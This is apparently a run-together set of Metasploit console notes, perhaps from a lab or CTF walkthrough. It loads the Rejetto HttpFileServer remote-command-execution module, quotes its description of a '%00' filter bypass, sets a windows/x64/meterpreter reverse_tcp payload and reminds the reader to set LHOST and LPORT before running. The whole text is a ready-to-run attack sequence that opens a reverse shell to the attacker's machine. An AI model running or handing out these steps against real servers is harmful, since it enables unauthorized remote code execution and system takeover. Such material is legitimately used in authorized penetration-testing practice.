searchtype:exploitname:rejettouseexploit/windows/http/rejetto_hfs_execinfo# Description:# Rejetto HttpFileServer (HFS) is vulnerable to remote command # execution attack due to a poor regex in the file ParserLib.pas. This # module exploits the HFS scripting commands by using '%00' to bypass # the filtering. This module has been tested successfully on HFS 2.3b # over Windows XP SP3, Windows 7 SP1 and Windows 8.run
# Type of payload can be changed base on the target O.S. architecturesetpayloadwindows/x64/meterpreter/reverse_tcp# Always check for the LHOST and LPORT valuesrun